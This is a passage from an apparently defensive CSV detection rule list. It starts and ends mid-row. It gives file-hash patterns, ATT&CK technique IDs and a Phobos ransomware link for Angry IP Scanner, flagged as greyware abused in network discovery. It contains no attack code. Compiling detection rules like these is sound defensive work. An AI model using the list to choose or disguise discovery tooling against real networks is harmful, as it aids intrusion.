TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1aa48436b6193acff1c9fe26e1456f35d5891aa90be2f203f5d59b77fa82df5a*",".{0,1000}1aa48436b6193acff1c9fe26e1456f35d5891aa90be2f203f5d59b77fa82df5a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1aea638f681b471f2bbe8714673b0c2fdd7f590b33cda162020e601f961dd4d0*",".{0,1000}1aea638f681b471f2bbe8714673b0c2fdd7f590b33cda162020e601f961dd4d0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1b89a1c5e9ef0bf0c91232fad88f31a6a27936407bff9e312a61ce5aab2bdac4*",".{0,1000}1b89a1c5e9ef0bf0c91232fad88f31a6a27936407bff9e312a61ce5aab2bdac4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1bff328616d4205bf3182c51e6267cee29b03e9cda22671cf0f2c153a4e39d0d*",".{0,1000}1bff328616d4205bf3182c51e6267cee29b03e9cda22671cf0f2c153a4e39d0d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1c90f970cc49e643c0c108f63e6d3a7696b2f28da91a42fc0fb234562f48e3ce*",".{0,1000}1c90f970cc49e643c0c108f63e6d3a7696b2f28da91a42fc0fb234562f48e3ce.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1d83e3da93ce0ef31a742f8f3ed6b77fc29566f7e3b4f7b240f2adf7c40a2036*",".{0,1000}1d83e3da93ce0ef31a742f8f3ed6b77fc29566f7e3b4f7b240f2adf7c40a2036.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1e6f9b25d6e296f2f63dac75b8abd30cc6f0a85cd7bea0579d081fea67085082*",".{0,1000}1e6f9b25d6e296f2f63dac75b8abd30cc6f0a85cd7bea0579d081fea67085082.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1e8dc49b24079e1f1b78fe64f54e0c222be67d45bbd2a6e5f13e06ca10d75004*",".{0,1000}1e8dc49b24079e1f1b78fe64f54e0c222be67d45bbd2a6e5f13e06ca10d75004.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1e9b04a795d2cf5d7c71b576c13f35873413e1c8031019e951ba65e39655be58*",".{0,1000}1e9b04a795d2cf5d7c71b576c13f35873413e1c8031019e951ba65e39655be58.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1ec5de34fbde95ee1b1237a78d01bd39925007ca1d9e128fa470ec090c176de9*",".{0,1000}1ec5de34fbde95ee1b1237a78d01bd39925007ca1d9e128fa470ec090c176de9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*1f14b24c5bf0a3ddc9af6394eab7245bd6af7f4c20322cd4177ef24e5e86bed0*",".{0,1000}1f14b24c5bf0a3ddc9af6394eab7245bd6af7f4c20322cd4177ef24e5e86bed0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2043a9ceaa7f2eeb1bb77a9fb932bb484c848d167680ee34fccbf1684a7147ab*",".{0,1000}2043a9ceaa7f2eeb1bb77a9fb932bb484c848d167680ee34fccbf1684a7147ab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*216ed12522652f3e745cb0e8313bc1fe245de0ab6b8cb5846d385858d59ba6b2*",".{0,1000}216ed12522652f3e745cb0e8313bc1fe245de0ab6b8cb5846d385858d59ba6b2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2183b543d0a5fa662cb4413e8ad030499e3852b8466142a7040cd7fe0f4ef2b8*",".{0,1000}2183b543d0a5fa662cb4413e8ad030499e3852b8466142a7040cd7fe0f4ef2b8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*21ea0b982bc934dbe8fd26234feee56d1093961de376f41dc82b59adf19c1505*",".{0,1000}21ea0b982bc934dbe8fd26234feee56d1093961de376f41dc82b59adf19c1505.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2236ee082c1c00e9423365db339a811a36869fcc4d3438e8c89982ccfe4917f4*",".{0,1000}2236ee082c1c00e9423365db339a811a36869fcc4d3438e8c89982ccfe4917f4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*229e1c2dcb1fcccacd2816c7a0e1ad43733f7a09cf76df4ecd53ccdafee8bdda*",".{0,1000}229e1c2dcb1fcccacd2816c7a0e1ad43733f7a09cf76df4ecd53ccdafee8bdda.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*22c57d4a0ba5f22b33573aaa1d08f562375a9e33c7d4705fadadbb06450fff00*",".{0,1000}22c57d4a0ba5f22b33573aaa1d08f562375a9e33c7d4705fadadbb06450fff00.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2353b409ea98230f05e0d26815ad1517fd49b5996d009612fe691f9ace020400*",".{0,1000}2353b409ea98230f05e0d26815ad1517fd49b5996d009612fe691f9ace020400.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2376c3f4134f56449a4ef506be95da5ced01ec152ad558840c47e87ec160235c*",".{0,1000}2376c3f4134f56449a4ef506be95da5ced01ec152ad558840c47e87ec160235c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2496e4de6363347e5d36ee031c9d307d5f6e2533a20fb0d49d76cc4a2980e3b3*",".{0,1000}2496e4de6363347e5d36ee031c9d307d5f6e2533a20fb0d49d76cc4a2980e3b3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*24a8be4d92df01761061085589d4b912140dc5140861a33bc7addc00042de754*",".{0,1000}24a8be4d92df01761061085589d4b912140dc5140861a33bc7addc00042de754.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*24bde49e5cce1189783eb0ba3c93b48c8f7d994328dacaa4fa2b9a7e2d04ce8c*",".{0,1000}24bde49e5cce1189783eb0ba3c93b48c8f7d994328dacaa4fa2b9a7e2d04ce8c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*257ba9e0bb8890194c9e8fc0c606ca928ee75ac9ac0adfc4d53b4489038a5bb5*",".{0,1000}257ba9e0bb8890194c9e8fc0c606ca928ee75ac9ac0adfc4d53b4489038a5bb5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*25e40f43e35ae0bcff2feea99ec311ab0f1dfa84bb311972dca123f1be073c2b*",".{0,1000}25e40f43e35ae0bcff2feea99ec311ab0f1dfa84bb311972dca123f1be073c2b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*26052ec687ec20c6de1e140266b194cc316b4ad5eef808e432a5f18988af2819*",".{0,1000}26052ec687ec20c6de1e140266b194cc316b4ad5eef808e432a5f18988af2819.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2b2705d375cb293e59fbd641bcc42936e458666acbc6a43d81a281091574d469*",".{0,1000}2b2705d375cb293e59fbd641bcc42936e458666acbc6a43d81a281091574d469.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2bd2ecd96c79e54de7c0e286107d0a8def7a3f52fc1fd114736fe51ce6a0bcca*",".{0,1000}2bd2ecd96c79e54de7c0e286107d0a8def7a3f52fc1fd114736fe51ce6a0bcca.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2d911f801c317eefce3ae952ef5a8c3625c0ba03c9dfb286534511958910b29e*",".{0,1000}2d911f801c317eefce3ae952ef5a8c3625c0ba03c9dfb286534511958910b29e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2e9ce2ed5ed7d036357e30c59478f345a7266f3531c2621785b91186ce241911*",".{0,1000}2e9ce2ed5ed7d036357e30c59478f345a7266f3531c2621785b91186ce241911.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*2eb477c2093771c42fd12d4c6c4bd7b94b9b6238909bdd5b3fb872408ce127a5*",".{0,1000}2eb477c2093771c42fd12d4c6c4bd7b94b9b6238909bdd5b3fb872408ce127a5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*313f6252693b97c7b97fd97da6323ecf9ca3342819e954fb23f1b3988d9ec464*",".{0,1000}313f6252693b97c7b97fd97da6323ecf9ca3342819e954fb23f1b3988d9ec464.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3166a71c855545de502838af5fdec240655d4946cbf81e32181bee033a1cb86a*",".{0,1000}3166a71c855545de502838af5fdec240655d4946cbf81e32181bee033a1cb86a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*31a9863499b273ade500620c3863eac9d905c677aecfe8e8c3d68fad63e1e343*",".{0,1000}31a9863499b273ade500620c3863eac9d905c677aecfe8e8c3d68fad63e1e343.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*32544295fb7ff44cb0052693474c713aa5b9fdd0574bed4a29f09fad6b1733eb*",".{0,1000}32544295fb7ff44cb0052693474c713aa5b9fdd0574bed4a29f09fad6b1733eb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3283db621b621cbd7761709125c8097dc52ef0b9329bd25c9eb79a162b86eb12*",".{0,1000}3283db621b621cbd7761709125c8097dc52ef0b9329bd25c9eb79a162b86eb12.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*32ef83acc082cff716fd44e6f96f80c8bc39f1a3de74e59a2afcf71592374325*",".{0,1000}32ef83acc082cff716fd44e6f96f80c8bc39f1a3de74e59a2afcf71592374325.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3327d1a9abb9c15aea54434986986bf094fca303a3bd0cf82189d32a0dce44aa*",".{0,1000}3327d1a9abb9c15aea54434986986bf094fca303a3bd0cf82189d32a0dce44aa.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*34d8c2352fa1c264b7d9146069ebc780495b896bc767c10ba916e5a55cb9d1a6*",".{0,1000}34d8c2352fa1c264b7d9146069ebc780495b896bc767c10ba916e5a55cb9d1a6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*356d44637750712f238bd27f49fc6dba7f5ce22c92c83e94be7b9d3f59e54853*",".{0,1000}356d44637750712f238bd27f49fc6dba7f5ce22c92c83e94be7b9d3f59e54853.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*362e60a32dc864d5660bb7a9caae50b068bdd81924469bb014af395ebeef9a9e*",".{0,1000}362e60a32dc864d5660bb7a9caae50b068bdd81924469bb014af395ebeef9a9e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3adee5344212720044b12dac4fa3e11231bb07a9cd65e2bd6031804278a3ef35*",".{0,1000}3adee5344212720044b12dac4fa3e11231bb07a9cd65e2bd6031804278a3ef35.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3b047ae119ef323d9fa486d1be07bcf85163fc392ab02ec37fd5437578d06d4b*",".{0,1000}3b047ae119ef323d9fa486d1be07bcf85163fc392ab02ec37fd5437578d06d4b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3b29215b47016a94daad3066fcfa2c11599d03ced78e4f40a71cb152aa9b1d5f*",".{0,1000}3b29215b47016a94daad3066fcfa2c11599d03ced78e4f40a71cb152aa9b1d5f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3b9a9cc912b0817c09577835d094c74a61911213e0533f606f20a602ea3c1703*",".{0,1000}3b9a9cc912b0817c09577835d094c74a61911213e0533f606f20a602ea3c1703.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3bd117db83f5fae64618cfdf7def01d1f91cb00245af1bfbccbcd671978d62bd*",".{0,1000}3bd117db83f5fae64618cfdf7def01d1f91cb00245af1bfbccbcd671978d62bd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3c577e92b14614dc484b1062561dbab2550708789fa1e70f7136c44195dd7275*",".{0,1000}3c577e92b14614dc484b1062561dbab2550708789fa1e70f7136c44195dd7275.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*3e7874880edf4af1c31a79d1291358791c9fbec5ee633839712af9edde7dbada*",".{0,1000}3e7874880edf4af1c31a79d1291358791c9fbec5ee633839712af9edde7dbada.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*400ed1628aabb30719dcca007c4d5a78e8cfcb794d35621c787a76e20fbb58c6*",".{0,1000}400ed1628aabb30719dcca007c4d5a78e8cfcb794d35621c787a76e20fbb58c6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*407225db88e109bedc93d568ec7b0a241fc362156587b8b710bc2cbe270c257c*",".{0,1000}407225db88e109bedc93d568ec7b0a241fc362156587b8b710bc2cbe270c257c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*40c2cf70de786de022195f0e3eb003c0f81c4dcb177fd1aad0c6cbb489eb900b*",".{0,1000}40c2cf70de786de022195f0e3eb003c0f81c4dcb177fd1aad0c6cbb489eb900b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*410e18b7e5221f4759bc9f7ed1c2daf1fa919b588db0f3430819854bd0c3d432*",".{0,1000}410e18b7e5221f4759bc9f7ed1c2daf1fa919b588db0f3430819854bd0c3d432.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*41b647ed1bfa946a10402ea65ff73f59309ac1a208e304f2ce68664ad247e3d7*",".{0,1000}41b647ed1bfa946a10402ea65ff73f59309ac1a208e304f2ce68664ad247e3d7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*43a9334196ef0bd1d9c1247b7fac5110f4fa1daabd565f7ff5b6e2e8ae5102cc*",".{0,1000}43a9334196ef0bd1d9c1247b7fac5110f4fa1daabd565f7ff5b6e2e8ae5102cc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*442fbc52ff95adad5ab1e0325fe7a74c5aef1816c6870d83df2fba658edb208d*",".{0,1000}442fbc52ff95adad5ab1e0325fe7a74c5aef1816c6870d83df2fba658edb208d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*4452bf743b91f801adca4d2faeb2333fc33f22a478251d6b910f204f0f06dd6c*",".{0,1000}4452bf743b91f801adca4d2faeb2333fc33f22a478251d6b910f204f0f06dd6c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*451728655552b12d5f39dc742f9877f79ba194ec57b2807821d09b9e4094315a*",".{0,1000}451728655552b12d5f39dc742f9877f79ba194ec57b2807821d09b9e4094315a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*461c507d612d0d88c91ef4dde79f266ecbaa3b5518df24597b8b40af6dc90ddb*",".{0,1000}461c507d612d0d88c91ef4dde79f266ecbaa3b5518df24597b8b40af6dc90ddb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - 